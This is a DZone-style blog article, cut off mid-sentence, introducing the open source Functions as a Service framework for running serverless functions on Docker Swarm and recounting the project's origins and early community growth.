CC-MAIN-2021-43
refinedweb
312
75
Learning Kotlin: By [Snippet] Want to learn more about the by keyword in Kotlin? Check out this code snippet on using the by keyword to delegate the getter/setter into separate classes. Join the DZone community and get the full member experience.Join For Free The fourth set of Koans looks at properties, while the first two look at getters and setters. If you coming from another programming language, then these should work the way you expect. — the result we get is always HAHAHA. We could store the result in the instance and return the value assigned, but we do not have to. The key takeaway is that we have ensured the logic for our properties in one reusable place, rather than scattered across multiple getters and setters. import kotlin.reflect.KProperty class User { var name : String by Delegate() var eyeColour : String by Delegate(); } class Delegate { operator fun getValue(thisRef: Any?, property: KProperty<*>): String { println("$thisRef, thank you for delegating '${property.name}' to me!") return "HAHAHA" } operator fun setValue(thisRef: Any?, property: KProperty<*>, value: String) { println("$value has been assigned to '${property.name}' in $thisRef.") } } fun main(args: Array<String>) { val user = User() user.name = "Robert" user.eyeColour = "Green" println("My word ${user.name} but your eyes are ${user.eyeColour}") } Published at DZone with permission of Robert Maclean, DZone MVB. See the original article here. Opinions expressed by DZone contributors are their own.
https://dzone.com/articles/learning-kotlin-by-snippet
CC-MAIN-2021-43
refinedweb
233
61.02
In this article we are going to discuss one beautiful feature of C# , Partial Class. Using partial class concept we can split a single class in various small sections and each section (definition) will share same name. If you closely observe any web page then you will find that by default main class is qualify as partial class like below. Let’s see how to define partial class in our own. We have to use partial keyword in front of class definition. using System;using System.Collections;using System.Data;using System.Collections.Generic;using System.Runtime.InteropServices;namespace Test1{ partial class A { public void Partial_A() { Console.WriteLine("I am partial A"); } } partial class A { public void Partial_B() { Console.WriteLine("I am other part of A"); } } class Program { static void Main(string[] args) { A a = new A(); a.Partial_A(); Console.ReadLine(); } }} In this example we have defined “A” class as partial class. So that, we are allowed to define “A” class more than one. But in behind (in IL code) .NET compiler combines both definitions in a single class. Below is the screen of IL code. This is output screen of this code. No, we can define partial class anywhere in project/application. It is not necessary to define in same file. In below example we will implement partial class in different .CS file but they must be in same namespace like below. using System;using System.Collections;using Test1; namespace Test1{ partial class A { public void Partial_A() { Console.WriteLine("First Part"); } } partial class A { public void Partial_B() { Console.WriteLine("Second Part"); } } class Program { static void Main(string[] args) { A a = new A(); a.Partial_A(); a.Partial_B(); a.Partial_C(); Console.ReadLine(); } }} using System;using System.Collections.Generic;using System.Linq;using System.Text; namespace Test1{ partial class A { public void Partial_C() { Console.WriteLine("Second Part"); } }} Here is output screen. This is the example of partial class in C#. Hope you have understood the concept and enjoyed the article. Latest Articles Latest Articles from Sourav.Kayal Login to post response
http://www.dotnetfunda.com/articles/show/2500/implement-partial-class-in-csharp
CC-MAIN-2017-39
refinedweb
339
61.43
Code. Collaborate. Organize. No Limits. Try it Today. The Compact Framework omits the main encryption features in the Cryptography namespace to make room for more important features. Fortunately, it is not terribly difficult to implement some sort of cryptography to hide your sensitive data. I wanted to find a small algorithm that was secure and portable. After doing a little searching, I ran across the Tiny Encryption Algorithm (TEA). This algorithm was developed in 1994 by David Wheeler and Roger Needham of Cambridge University. This algorithm is extremely portable, and fast. There has been a successful cryptanalysis performed on the original TEA algorithm which caused the original authors to modify the TEA algorithm. The revised algorithm is called XTEA. There is not much information on this algorithm so there is no guarantee that the XTEA algorithm has not been broken as well. However, this algorithm could still be useful for applications that do not require the highest of security. The original algorithm was developed in C, but constructed in such a way that it is easy to port to other languages, like C#. I was able to port the original C algorithm to C# with minimal changes. I tested the algorithm on the full .NET Framework as well as the .NET Compact Framework and it works great on both platforms with no changes.For more information on how TEA encryption works, refer to the links at the bottom of this article. The Tiny Encryption Algorithm works on the principle of paired blocks of data. This makes it a little more challenging to prepare strings for encryption because you need to pass pairs of unsigned integers to the algorithm and then store them in some manner so the data can be recovered at a later point in time. I use some bit shifting to convert between integers and strings, so a little knowledge of number systems will help you out. Porting the code to C# was the easy part. After porting the C algorithm to C#, I ended up with the following function for encryption: private void code(uint[] v, uint[] k) { uint y = v[0]; uint z = v[1]; uint sum = 0; uint delta=0x9e3779b9; uint n=32; while(n-->0) { y += (z << 4 ^ z >> 5) + z ^ sum + k[sum & 3]; sum += delta; z += (y << 4 ^ y >> 5) + y ^ sum + k[sum >> 11 & 3]; } v[0]=y; v[1]=z; } Simple huh? They don't call it tiny for nothing! Here is the decrypt function: private void decode(uint[] v, uint[] k) { uint n=32; uint sum; uint y=v[0]; uint z=v[1]; uint delta=0x9e3779b9; sum = delta << 5 ; while(n-->0) { z -= (y << 4 ^ y >> 5) + y ^ sum + k[sum >> 11 & 3]; sum -= delta; y -= (z << 4 ^ z >> 5) + z ^ sum + k[sum & 3]; } v[0]=y; v[1]=z; } Note: I only modified what was necessary to get the code to compile. I also formatted the code to make it a little more readable. In the original algorithm, they used an unsigned long for the variables. In C, an unsigned is a 32-bit unsigned integer. In .NET land, the equivalent is an unsigned integer. Now we have reached the challenging part. To use the algorithm with strings, we have to convert the strings into an acceptable format. Here is a basic run-through of what I did to make use of the algorithm: My Encrypt function looks something like the following: Encrypt public string Encrypt(string Data, string Key) { uint[] formattedKey = FormatKey(Key); if(Data.Length%2!=0) Data += '\0'; // Make sure array is even in length. byte[] dataBytes = System.Text.ASCIIEncoding.ASCII.GetBytes(Data); string cipher = string.Empty; uint[] tempData = new uint[2]; for(int i=0; i<dataBytes.Length; i+=2) { tempData[0] = dataBytes[i]; tempData[1] = dataBytes[i+1]; code(tempData, formattedKey); cipher += ConvertUIntToString(tempData[0]) + ConvertUIntToString(tempData[1]); } return cipher; } The Decrypt function basically is just the reverse of the encrypt function: Decrypt public string Decrypt(string Data, string Key) { uint[] formattedKey = FormatKey(Key); int x = 0; uint[] tempData = new uint[2]; byte[] dataBytes = new byte[Data.Length / 8 * 2]; for(int i=0; i<Data.Length; i+=8) { tempData[0] = ConvertStringToUInt(Data.Substring(i, 4)); tempData[1] = ConvertStringToUInt(Data.Substring(i+4, 4)); decode(tempData, formattedKey); dataBytes[x++] = (byte)tempData[0]; dataBytes[x++] = (byte)tempData[1]; } string decipheredString = System.Text.ASCIIEncoding.ASCII.GetString(dataBytes, 0, dataBytes.Length); // Strip the null char if it was added. if(decipheredString[decipheredString.Length - 1] == '\0') decipheredString = decipheredString.Substring(0, decipheredString.Length - 1); return decipheredString; } ConvertUIntToString uint private string ConvertUIntToString(uint Input) { System.Text.StringBuilder output = new System.Text.StringBuilder(); output.Append((char)((Input & 0xFF))); output.Append((char)((Input >> 8) & 0xFF)); output.Append((char)((Input >> 16) & 0xFF)); output.Append((char)((Input >> 24) & 0xFF)); return output.ToString(); } Here is the function to undo what ConvertUIntToString does: private uint ConvertStringToUInt(string Input) { uint output; output = ((uint)Input[0]); output += ((uint)Input[1] << 8); output += ((uint)Input[2] << 16); output += ((uint)Input[3] << 24); return output; } Anding the shifted Input with 0xFF will cause only 1 byte to be returned. The sample code includes a sample application for the .NET Framework and the .NET Compact Framework. 0xFF
http://www.codeproject.com/Articles/6137/Tiny-Encryption-Algorithm-TEA-for-the-Compact-Fram?fid=33635&df=90&mpp=10&sort=Position&spc=Relaxed&tid=4592645
CC-MAIN-2014-15
refinedweb
869
57.27
In a previous blog post we have seen how we can use a BaseScript AST transformation to set a base script class for running scripts. Since Groovy 2.3 we can apply the @BaseScript annotation on package and import statements. Also we can implement a run method in our Script class in which we call an abstract method. The abstract method will actually run the script, so we can execute code before and after the script code runs by implementing logic in the run method. In the following sample we create a Script class CustomScript. We implement the run method and add the abstract method runCode: // File: CustomScript.groovy package com.mrhaki.groovy.blog abstract class CustomScript extends Script { def run() { before() try { // Run actually script code. final result = runCode() println "Script says $result" } finally { println 'Script ended' } } private void before() { println 'Script starts' } // Abstract method as placeholder for // the actual script code to run. abstract def runCode() } Next we create a Groovy script where we use our new CustomScript class. // File: Sample.groovy // Since Groovy 2.3 we can apply the // @BaseScript annotation on package // and import statement. @groovy.transform.BaseScript(com.mrhaki.groovy.blog.CustomScript) package com.mrhaki.groovy.blog // Script code: final String value = 'Groovy rules' assert value.size() == 12 // Return value value When we run our script we see the following output: Before script runs Script says Groovy rules Script ended Code written with Groovy 2.3.
http://mrhaki.blogspot.com/2014/05/groovy-goodness-basescript-with.html
CC-MAIN-2018-39
refinedweb
241
65.83
How to build your own Amazon Echo using a Raspberry Pi and ReSpeaker 2-Mics HAT. Story Introduction Cirrus) Hardware Overview - BUTTON: a User Button, connected to GPIO17 - MIC_L & Audio Plug What is the purpose of this project? In this project we will learn, how build your own AVS using a Raspberry Pi and ReSpeaker 2-Mics Pi HAT. In this project, because of the minimality and the new experience, I used the Raspberry Pi Zero W and latest version of Raspbian Jessie. Step 1: Connect ReSpeaker 2-Mics Pi HAT to Raspberry Pi Mount ReSpeaker 2-Mics Pi HAT on your Raspberry Pi, make sure that the pins are properly aligned when stacking the ReSpeaker 2-Mics Pi HAT. Step 2: Setup the driver on Raspberry Pi While the upstream wm8960 codec is not currently supported by current Pi kernel builds, upstream wm8960 has some bugs, Seeedstudio team fixed it. we must build it manually. Get the seeed voice card source code : git clone –depth=1 cd seeed-voicecard sudo ./install.sh reboot Check that the sound card name matches the source code seeed-voicecard : **** List of PLAYBACK Hardware Devices **** card 0: seeedvoicecard [seeed-voicecard], device 0: bcm2835-i2s-wm8960-hifi wm8960-hifi-0 [] Subdevices: 1/1 Subdevice #0: subdevice #0 Next apply the Alsa controls setting : sudo alsactl –file=asound.state restore If you want to change the Alsa settings, You can use following command to save it : sudo alsactl –file=asound.state store Before the test, configure sound settings and adjust the volume with alsamixer : pi@raspberrypi:~ $ alsamixer The Left and right arrow keys are used to select the channel or device and the Up and Down Arrows control the volume for the currently selected device. Quit the program with ALT+Q, or by hitting the Esc key. (More information) For test, you will hear what you say to the microphones (don’t forget to plug in an earphone or a speaker) : arecord –f cd -Dhw:0 | aplay -Dhw:0 Step 3: Setting up AVS on a Raspberry Pi In this section, we need to install the Amazon Alexa Voice Service on the Raspberry Pi. See the full description and installation method from here. Step 4: Start the Alexa Voice Service Before you run the Alexa Voice Service (according to step 7), It is necessary to Changing the audio output to headphone jack. To do this, just enter the following command (More Information) : sudo amixer cset numid=3 1 Step? “ Step 6: How to use User Button (Optional) There is an on-board User Button, which according to the Seeedstudio description, is connected to GPIO17 (or WiringPi 0). There is an easy way to use a button (instead of speaking “Alexa”) to trigger Alexa Voice Service. Open GPIOWakeWordEngine.cpp file from the following path with text editor (for example nano): cd Desktop/alexa-avs-sample–app/samples/wakeWordAgent/src/ sudo nano GPIOWakeWordEngine.cpp Then modify Line 11 as the following code and save (GPIO_PIN 0 in WiringPi Library is the same as GPIO17): static const int GPIO_PIN = 0; It is necessary to recompile again as the following code: cd Desktop/alexa-avs-sample–app/samples/ cd wakeWordAgent/src && cmake . && make -j4 In the end, to test, we use the following command (Just note that it is necessary before executing the following command, run AVS web service and sample app according to step 7) : cd wakeWordAgent/src && sudo ./wakeWordAgent -e gpio Step 7: How to use the on-board APA102 LEDs (Optional) As described by Seeedstudio, 3 APA102 RGB LEDs connected to SPI interface. In this section, to control the LEDs, We will use the Pi4J project. Actually Pi4J is intended to provide a friendly object-oriented I/O API and implementation libraries for Java Programmers to access the full I/O capabilities of the Raspberry Pi platform. In the first step, please enable SPI According to the following instructions: sudo raspi-config Now Go to Interfacing Options, Go to SPI, Enable SPI, exit the config menu and reboot. According to my personal experience, to do this, we need to use the latest snapshot builds. version 1.1 is not compatible with the latest version of the Raspberry Pi kernel. To download snapshot builds in your Maven project, you must include the following repository definition in your pom.xml file. Open pom.xml file from the following path with text editor (for example nano): cd Desktop/alexa-avs-sample–app/samples/ sudo nano pom.xml Now add following lines to pom.xml: <repositories> <repository> <id>oss-snapshots-repo</id> <name>Sonatype OSS Maven Repository</name> <url></url> <snapshots> <enabled>true</enabled> <updatePolicy>always</updatePolicy> </snapshots> </repository> </repositories> It is also necessary that add following lines to pom.xml. The following dependency is all that is needed to include Pi4J (core library) in your Maven project. <dependency> <groupId>com.pi4j</groupId> <artifactId>pi4j-core</artifactId> <version>1.2-SNAPSHOT</version> </dependency> In the next step, Open AVSController.java file from the following path with text editor : cd Desktop sudo nano AVSController.java Now add following lines to AVSController.java (to the top of the file) : import com.pi4j.io.gpio.GpioController; import com.pi4j.io.gpio.GpioFactory; import com.pi4j.io.gpio.GpioPinDigitalOutput; import com.pi4j.io.gpio.Pin; import com.pi4j.io.gpio.RaspiPin; Also add following lines to AVSController.java to AVSController class : private GpioPinDigitalOutput dat; private GpioPinDigitalOutput clk; private int[] data; public int WIDTH; Then add following lines to AVSController.java (for example, after the initializeMicrophone function), Number 3 Here is the number of LEDs. initapa102 (GpioFactory.getInstance(), RaspiPin.GPIO_12, RaspiPin.GPIO_14, 3); In the next step, add following lines to AVSController.java (for example, before the recordingStarted function) : public void initapa102 (GpioController gpio, Pin data_pin, Pin clock_pin, int n) { WIDTH = n; dat = gpio.provisionDigitalOutputPin (data_pin); clk = gpio.provisionDigitalOutputPin (clock_pin); data = new int[n]; // Set all off to start with. for (int i = 0; i < WIDTH; ++i) data[i] = 0; // And push that out to the devices. show (); } public void set (int n, int r, int g, int b, int bright) { if (n < 0 || n >= WIDTH || r < 0 || r > 255 || g < 0 || g > 255 || b < 0 || b > 255 || bright < 0 || bright > 31) throw new IllegalArgumentException (“Invalid parameter”); data[n] = (bright << 24) | (r << 16) | (g << 8) | b; } public void clear () { // Set all off to start with. for (int i = 0; i < WIDTH; ++i) data[i] = 0; // And push that out to the devices. show (); } public final void show () { // Transmit preamble for (int i = 0; i < 4; ++i) write_byte ((byte) 0); // Send data for (int i = 0; i < WIDTH; ++i) write_led (data[i]); // And latch it latch (); } private void write_byte (byte out) { for (int i = 7; i >= 0; –i) { dat.setState ((out & (1 << i)) != 0); clk.setState (true); clk.setState (false); } } private void write_led (int data) { write_byte ((byte) (0xe0 | ((data >> 24) & 0x1f))); write_byte ((byte) (data)); write_byte ((byte) (data >> 8)); write_byte ((byte) (data >> 16)); } private void latch () { // Transmit zeros not ones! dat.setState (false); // And 36 of them! for (int i = 0; i < 36; ++i) { clk.setState (true); clk.setState (false); } } Aslo add following lines to recordingStarted function, This command turns on the lights. set(0, 255, 0, 0, 31); show(); set(1, 0, 255, 0, 31); show(); set(2, 0, 0, 255, 31); show(); Then add following lines to recordingCompleted function, This command turns off the lights. clear(); Aslo add following lines to onAlexaSpeechStarted function, This command turns on the lights during Alexa response. for (int x = 0; x < 3; ++x) { set(x, (x+1)*8, (x+1)*26, (x+1)*70, 31); show(); } Then add following lines to onAlexaSpeechFinished function, This command turns off the lights after Alexa response. clear(); Finally, we need to save the file and recompile with the following command : cd Desktop/alexa-avs-sample–app/samples/javaclient mvn install In the end, to test, run AVS web service and sample app according to step 7. Read More Detail: Build Your Own Amazon Echo Using a RPI and ReSpeaker HAT Current Project / Post can also be found using: - Echo Input – Bring Alexa to your own speaker Low cost PCB at PCBWay - only $5 for 10 PCBs and FREE first order for new members PCB Assembly service starts from $30 with Free shipping all around world + Free stencil Extra 15% off for flex and rigid-flex PCB
https://projects-raspberry.com/build-your-own-amazon-echo-using-a-rpi-and-respeaker-hat/
CC-MAIN-2021-25
refinedweb
1,392
51.58
brk, sbrk - change data segment size #include <unistd.h> int brk(void *end_data_segment)); void *sbrk(ptrdiff_t increment)); brk sets the end of the data segment to the value specified by end_data_segment. end_datasegment must be greater than end of the text segment and it must be 16kB before the end of the stack. sbrk increments the program's data space by increment bytes. sbrk isn't a system call, it is just a C library wrapper. On success, brk returns zero, and sbrk returns a pointer to the start of the new area. On error, -1 is returned, and errno is set to ENOMEM. BSD 4.3 brk and sbrk are not defined in the C Standard and are deli- berately excluded from the POSIX.1 standard (see paragraphs B.1.1.1.3 and B.8.3.3). execve(2), getrlimit(2), malloc(3)
http://www.linuxsavvy.com/resources/linux/man/man2/brk.2.html
CC-MAIN-2018-05
refinedweb
144
76.72
Creates an array of LDAPMod from a Slapi_Entry. #include "slapi-plugin.h" int slapi_entry2mods(const Slapi_Entry *e, char **dn, LDAPMod ***attrs); This function takes the following parameters: Pointer to a Slapi_Entry. Address of a char* that will be set on return to the entry DN. Address of an array of LDAPMod that will be set on return to a copy of the entry attributes. This function returns one of the following values: 0 if successful. non-0 if not successful. This function creates an array of LDAPMod of type LDAP_MOD_ADD from a Slapi_Entry. Such structures may be useful for example when performing LDAP add and modify operations as a client from inside a plug-in.
https://docs.oracle.com/cd/E19424-01/820-4810/aaifo/index.html
CC-MAIN-2018-05
refinedweb
115
65.93
Re: getting rid of NS0 (name space) in xml tags - From: "Leo Gan" <leo_gan_57@xxxxxxxxxxx> - Date: Thu, 13 Jul 2006 09:16:56 -0700 Hi, Is your partner use a self-made xml parser? As I know U can ignore the prefixes if U don't want to use the namespaces (it's quite strange, cose, the namespaces are one of the main part of XMl) and if U use MS xml-parsers. It's the parser's job to bother with namespases and prefixes. BTW BizTalk doesn't work well with xml-messages without namespaces. I agree that SQL adapter is sort of hard to understanding () could U, pleease, give more information about: I am using a sql adapter with an xml document schema and envelope schema... -- Regards Leonid Ganeline BizTalk Solution Developer =========================== ================================ "new_world_order_piggies" <newworldorderpiggies@xxxxxxxxxxxxxxxxxxxxxxxxx> wrote in message news:040A7286-EC0D-4193-9052-9FDB5694B587@xxxxxxxxxxxxxxxx I am using a sql adapter with an xml document schema and envelope schema. My understanding is that I need to use the same name space to put this into effect for the 2 schemas and allow biztalk to bring back multiple rows from SQL Server. Is this correct? The bottom line is that I need to remove the NS0: prepended to the output tags or our trading partner can't consume our xml. Is there any way to get rid of these prepended values? As a general comment if this is being monitored, I am surprised at the complexity and difficulty in using the sql adapter for biztalk, especially in terms of bringing back and interpreting multiple rows. I would've thought this would be much easier and further the fact that the schema tags are changed is outrageous. I'm sure someone can explain it and I'm also sure there are "good" reasons for it happening but really, to change the schema such that it no longer becomes portable really destroys the entire idea of xml being the self-describing, all-purpose data format it is supposed to be. In short, if there is a way to remove the cursed NS0 I'd love the hear about it. -- Thanks to any and all, NWOP. . - Follow-Ups: - Re: getting rid of NS0 (name space) in xml tags - From: new_world_order_piggies - Prev by Date: Re: Map Sequence groups - Next by Date: Re: BizTalk 2004 Configuration Error - Previous by thread: Re: use-case question - Next by thread: Re: getting rid of NS0 (name space) in xml tags - Index(es):
http://www.tech-archive.net/Archive/BizTalk/microsoft.public.biztalk.general/2006-07/msg00209.html
crawl-002
refinedweb
415
63.83
Adding a shelf button in Maya to launch Toolkit apps in Maya is pretty straightforward. Here is an example of how to add a custom shelf button that opens the Loader app. (Note that this assumes Toolkit is currently enabled in your Maya session, this does not bootstrap Toolkit). Open your Script Editor in Maya and paste in the following Python code: import maya.cmds as cmds # The internal Toolkit app name tk_app = "tk-multi-loader2" # The public function that opens the app dialog. This function is located in the app's # app.py file in the top directory (eg. install/apps/app_store/tk-multi-loader2/app.py. # The name of this function varies from app to app, but is generally easy to determine by # looking at the code. call_func = "open_publish" try: import sgtk # get the current engine (e.g. tk-maya) current_engine = sgtk.platform.current_engine() if not current_engine: cmds.error("Shotgun integration is not available!") # find the current instance of the app: app = current_engine.apps.get(tk_app) if not app: cmds.error("The Toolkit app '%s' is not available!" % tk_app) # call the public method on the app to show the dialog: app_open_func = getattr(app, call_func) app_open_func() except Exception, e: msg = "Unable to launch Toolkit app '%s': %s" % (tk_app, e) cmds.confirmDialog(title="Toolkit Error", icon="critical", message=msg) cmds.error(msg) Select this code and drag it on to your custom shelf. See the Maya docs for more info on how to work with custom shelf buttons You should be able to use this code example to launch any Toolkit apps that are enabled in Maya by modifying the tk_app and call_func variables at the top.
https://support.shotgunsoftware.com/hc/en-us/articles/219040618-How-do-I-add-a-shelf-button-to-launch-a-Toolkit-app-in-Maya-
CC-MAIN-2018-22
refinedweb
277
58.38
We've had the regular two-week (and one day) merge window, and -rc1 is out, and the merge window is closed. [ I suspect I'll still merge the SCore architecture, I wanted to give it a quick peek, but I've been busy with all the other patches so I'm closing the merge window now, but leaving myself the option of merging Score later - last I looked, the only non-SCore file it touched was the MAINTAINERS file, so it's not like it should break anything else ] There's a lot in there, but let me say that as far as the whole merge window has gone, I've seldom felt happier merging stuff from people. I'm really hoping it isn't just a fluke, but people kept their git trees clean, and while there were a couple of times that I said "no, I'm not going to merge that", on the whole this was a really painless merge window for me. I'm not saying that it was necessarily less bug-free than usual, I'm just saying that on the whole people sent me merge requests that made sense, explained what they did, and when I pulled I saw clear development lines. That just makes it much easier for me. So thanks to everybody involved. I hope that doesn't mean that it was really painful for others, or that we'll be chasing down more bugs than usual. And I _really_ hope we can keep things going this way, and it wasn't a one-off "things just happened to work this time". As to the actual changes - too many to list. As usual, the bulk of the changes are to drivers (70% of the diffs), with drivers/staging being the bulk of that (about 60% of all driver changes - 40% of the total). But wonder of wonder, I think drivers/staging actually _shrank_ this time around, alledgely due to cleanups. Believe that who will. On the filesystem front, we had btrfs, ext3 and xfs getting active development (Why xfs? Beats me, but that's what the stats say), and a fair chunk of work on the whole fsnotify unification work. And the VFS layer got some TLC wrt ACL and private namespace handling. On architectures: ARM, powerpc, mips, sh, x86 are the bulk of it. On ARM, the bulk is new platforms (u300, freescale stmp, whatever), there seems to be no end to crazy new arm platforms. On x86 (and at least some degree on powerpc), a noticeable part is the whole new perf-counter subsystem. Along with lots and lots of other stuff. On the whole? Tons of stuff. Let's start testing and stabilizing. Linus
http://www.linux.com/news/software/linux-kernel/23008-linux-2631-rc1-released
CC-MAIN-2013-20
refinedweb
456
76.96
Wednesday, 30 May 2012 Dad Didn't Buy Any Games I grew up the 80's just outside London. For those of you of a different vintage let me paint a picture. These were the days when "Personal Computers", as they were then styled, were taking the world by storm. Every house would be equipped with either a ZX Spectrum, a Commodore 64 or an Amstrad CPC. These were 8 bit computers which were generally plugged into the family television and spent a good portion of their time loading games like Target: Renegade from an audio cassette. But not in our house; we didn't have a computer. I remember mournfully pedalling home from friends houses on a number of occasions, glum as I compared my lot with theirs. Whereas my friends would be spending their evenings gleefully battering their keyboards as they thrashed the life out of various end-of-level bosses I was reduced to *wasting* my time reading. That's right Enid Blyton - you were second best in my head. Then one happy day (and it may have been a Christmas present although I'm not certain) our family became the proud possessors of an Amstrad CPC 6128: But I was wrong. I had reckoned without my father. For reasons that I've never really got to the bottom of Dad had invested in the computer but not in the games. Whilst I was firmly of the opinion that these 2 went together like Lennon and McCartney he was having none of it. "You can write your own son" he intoned and handed over a manual which contained listings for games: And that's where it first began really. I would spend my evenings typing the Locomotive Basic listings for computer games into the family computer. Each time I started I would be filled with great hopes for what might result. Each time I tended to be rewarded with something that looked a bit like this: I'm not sure that it's possible to learn to program by osmosis but if it is I'm definitely a viable test case. I didn't become an expert Locomotive Basic programmer (was there ever such a thing?) but I did undoubtedly begin my understanding of software.... Thanks Dad! Monday, 7 May 2012 Globalize.js: number and date localisation made easy I wanted to write about a JavaScript library which seems to have had very little attention so far. And that surprises me as it's - Brilliant! - Solves a common problem that faces many app developers who work in the wonderful world of web; myself included The library is called Globalize.js and can be found on GitHub here. Globalize.js is a simple JavaScript library that allows you to format and parse numbers and dates in culture specific fashion. Why does this matter? Because different countries and cultures do dates and numbers in different ways. Christmas Day this year in England will be 25/12/2012 (dd/MM/yyyy). But for American eyes this should be 12/25/2012 (M/d/yyyy). And for German 25.12.2012 (dd.MM.yyyy). Likewise, if I was to express numerically the value of "one thousand exactly - to 2 decimal places", as a UK citizen I would do it like so: 1,000.00. But if I was French I'd express it like this: 1.000,00. You see my point? Why does this matter to me? For a number of years I've been working on applications that are used globally, from London to Frankfurt to Shanghai to New York to Singapore and many other locations besides. The requirement has always been to serve up localised dates and numbers so users experience of the system is more natural. Since our applications are all ASP.NET we've never really had a problem server-side. Microsoft have blessed us with all the goodness of System.Globalization which covers hundreds of different cultures and localisations. It makes it frankly easy: using System.Globalization; //Produces: "06.05.2012" new DateTime(2012,5,6).ToString("d", new CultureInfo("de-DE")); //Produces: "45,56" 45.56M.ToString("n", new CultureInfo("fr-FR")); The problem has always been client-side. If you need to localise dates and numbers on the client what do you do? JavaScript Date / Number Localisation - the Status Quo Well to be frank - it's a bit rubbish really. What's on offer natively at present basically amounts to this: This is better than nothing - but not by much. There's no real control or flexibility here. If you don't like the native localisation format or you want something slightly different then tough. This is all you've got to play with. For the longest time this didn't matter too much. Up until relatively recently the world of web was far more about the thin client and the fat server. It would be quite standard to have all HTML generated on the server. And, as we've seen .NET (and many other back end enviroments as well) give you all the flexiblility you might desire given this approach. But the times they are a-changing. And given the ongoing explosion of HTML 5 the rich client is very definitely with us. So we need tools. Microsoft doing *good things* Hands up who remembers when Microsoft first shipped it's ASP.NET AJAX library back in 2007? Well a small part of this was the extensions ASP.NET AJAX added to JavaScripts native Date and Number objects.... These extensions allowed the localisation of Dates and Numbers to the current UI culture and the subsequent string parsing of these back into Dates / Numbers. These extensions pretty much gave JavaScript the functionality that the server already had in System.Globalization. (not quite like-for-like but near enough the mark) I'm not aware of a great fuss ever being made about this - a fact I find surprising since one would imagine this is a common need. There's good documentation about this on MSDN - here's some useful links: - Ajax Script Globalization and Localization - Walkthrough: Globalizing a Date by Using Client Script - JavaScript Base Type Extensions - Date.parseLocale - Date.localeFormat - Number.localeFormat - Number.parseLocale When our team became aware of this we started to make use of it in our web applications. I imagine we weren't alone... Microsoft doing *even better things* (Scott Gu to the rescue!) I started to think about this again when MVC reared it's lovely head. Like many, I found I preferred the separation of concerns / testability etc that MVC allowed. As such, our team was planning to, over time, migrate our ASP.NET WebForms applications over to MVC. However, before we could even begin to do this we had a problem. Our JavaScript localisation was dependant on the ScriptManager. The ScriptManager is very much a WebForms construct. What to do? To the users it wouldn't be acceptable to remove the localisation functionality from the web apps. The architecture of an application is, to a certain extent, meaningless from the users perspective - they're only interested in what directly impacts them. That makes sense, even if it was a problem for us. Fortunately the Great Gu had it in hand. Lo and behold the this post appeared on the jQuery forum and the following post appeared on Guthrie's blog: Yes that's right. Microsoft were giving back to the jQuery community by contributing a jQuery globalisation plug-in. They'd basically taken the work done with ASP.NET AJAX Date / Number extensions, jQuery-plug-in-ified it and put it out there. Fantastic! Using this we could localise / globalise dates and numbers whether we were working in WebForms or in MVC. Or anything else for that matter. If we were suddenly seized with a desire to re-write our apps in PHP we'd *still* be able to use Globalize.js on the client to handle our regionalisation of dates and numbers. History takes a funny course... Now for my part I would have expected that this announcement to be followed in short order by dancing in the streets and widespread adoption. Surprisingly, not so. All went quiet on the globalisation front for some time and then out of the blue the following comment appeared on the jQuery forum by Richard D. Worth (he of jQuery UI fame): The long and short of which was: - The jQuery UI team were now taking care of (the re-named) Globalize.js library as the grid control they were developing had a need for some of Globalize.js's goodness. Consequently a home for Globalize.js appeared on the jQuery UI website: - The source of Globalize.js moved to this location on GitHub: - Perhaps most significantly, the jQuery globalisation plug-in as developed by Microsoft had now been made a standalone JavaScript library. This was clearly brilliant news for Node.js developers as they would now be able to take advantage of this and perform localisation / globalisation server-side - they wouldn't need to have jQuery along for the ride. Also, this would be presumably be good news for users of other client side JavaScript libraries like Dojo / YUI etc. Globalize.js clearly has a rosy future in front of it. Using the new Globalize.js library was still simplicity itself. Here's some examples of localising dates / numbers using the German culture: <script src="/Scripts/Globalize/globalize.js" type="text/javascript"></script> <script src="/Scripts/Globalize/cultures/globalize.culture.de-DE.js" type="text/javascript"></script> Globalize.culture("de-DE"); //"2012-05-06" - ISO 8601 format Globalize.format(new Date(2012,4,6), "yyyy-MM-dd"); //"06.05.2012" - standard German short date format of dd.MM.yyyy Globalize.format(new Date(2012,4,6), Globalize.culture().calendar.patterns.d); //"4.576,3" - a number rendered to 1 decimal place Globalize.format(4576.34, "n1"); Stick a fork in it - it's done The entry for Globalize.js on the jQuery UI site reads as follows: "version: 0.1.0a1 (not a jQuery UI version number, as this is a standalone utility) status: in development (part of Grid project)" I held back from making use of the library for some time, deterred by the "in development" status. However, I had a bit of dialog with one of the jQuery UI team (I forget exactly who) who advised that the API was unlikely to change further and that the codebase was actually pretty stable. Our team did some testing of Globalize.js and found this very much to be case. Everything worked just as we expected and hoped. We're now using Globalize.js in a production environment with no problems reported; it's been doing a grand job. In my opinion, Number / Date localisation on the client is ready for primetime right now - it works! Unfortunately, because Globalize.js has been officially linked in with the jQuery UI grid project it seems unlikely that this will officially ship until the grid does. Looking at the jQuery UI roadmap the grid is currently slated to release with jQuery UI 2.1. There isn't yet a release date for jQuery UI 1.9 and so it could be a long time before the grid actually sees the light of day. I'm hoping that the jQuery UI team will be persuaded to "officially" release Globalize.js long before the grid actually ships. Obviously people can use Globalize.js as is right now (as we are) but it seems a shame that many others will be missing out on using this excellent functionality, deterred by the "in development" status. Either way, the campaign to release Globalise.js officially starts here! The Future? There are plans to bake globalisation right into JavaScript natively with EcmaScript 5.1. There's a good post on the topic here. And here's a couple of historical links worth reading too:
https://blog.johnnyreilly.com/2012/05/
CC-MAIN-2020-16
refinedweb
1,998
66.44
Introducing Functions as a Service (FaaS) Introducing Functions as a Service (FaaS) There's no reason cloud providers should have a monopoly on serverless computing. Check out this open source framework that helps you use FaaS. Join the DZone community and get the full member experience.Join For Free Functions as a Service (FaaS) is a framework for building serverless functions on top of containers. I began this project as a proof of concept in October last year when I wanted to understand if I could run Alexa skills or Lambda functions on Docker Swarm. After some initial success, I released the first version of the code in Golang on GitHub in December. This post gives a straightforward introduction to serverless computing, then covers my top 3 features introduced in FaaS over the last 500 commits, and finishes with what's coming next and how to get involved. From that first commit, FaaS went on to gain momentum and over 2,500 stars on GitHub along with a small community of developers and hackers, who have been giving talks at meetups, writing their own cool functions, and contributing code. The highlight for me was winning a place in Moby's Cool Hacks keynote session at Dockercon in Austin in April. The remit for entries was to push the boundaries of what Docker was designed to do. What Is Serverless? Architecture Is Evolving "Serverless" is a misnomer — we're talking about a new architectural pattern for event-driven systems. For this reason, serverless functions are often used as connective glue between other services or in an event-driven architecture. In the days of old, we called this a service bus. Serverless is an evolution Serverless 